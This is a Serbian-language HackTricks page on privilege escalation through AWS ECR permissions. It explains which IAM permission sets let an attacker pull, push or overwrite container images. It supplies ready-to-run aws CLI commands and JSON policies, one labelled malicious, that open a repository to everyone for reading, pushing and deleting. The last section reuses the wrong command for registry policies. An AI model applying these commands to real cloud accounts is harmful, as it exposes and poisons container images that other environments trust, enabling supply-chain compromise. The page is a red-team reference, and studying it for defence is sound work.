AWS - ECR Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

Napadač sa dozvolama ecr:GetAuthorizationToken i ecr:BatchGetImage može se prijaviti na ECR i preuzeti slike.

Za više informacija o tome kako preuzeti slike:

AWS - ECR Post Exploitation

Potencijalni uticaj: Indirektni privesc presretanjem osetljivih informacija u saobraćaju.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

Napadač sa svim ovim dozvolama može se prijaviti na ECR i otpremiti slike. Ovo može biti korisno za eskalaciju privilegija na druga okruženja gde se koriste te slike.

Da biste naučili kako otpremiti novu sliku/ažurirati postojeću, proverite:

AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Kao i prethodni odeljak, ali za javne repozitorijume.

ecr:SetRepositoryPolicy

Napadač sa ovom dozvolom može promeniti polisu repozitorijuma kako bi sebi (ili čak svima) dodelio pristup za čitanje/pisanje. Na primer, u ovom primeru je omogućen pristup za čitanje svima.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Sadržaj my-policy.json datoteke:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

Kao i prethodni odeljak, ali za javne repozitorijume. Napadač može izmeniti politiku repozitorijuma javnog ECR repozitorijuma kako bi omogućio neovlašćen pristup ili povećao svoje privilegije.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Potencijalni uticaj: Neovlašćen javni pristup ECR javnom repozitorijumu, omogućavajući svakom korisniku da dodaje, preuzima ili briše slike.

ecr:PutRegistryPolicy

Napadač sa ovlašćenjem može promeniti polisu registra kako bi sebi, svom nalogu (ili čak svima) omogućio pristup za čitanje i pisanje.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated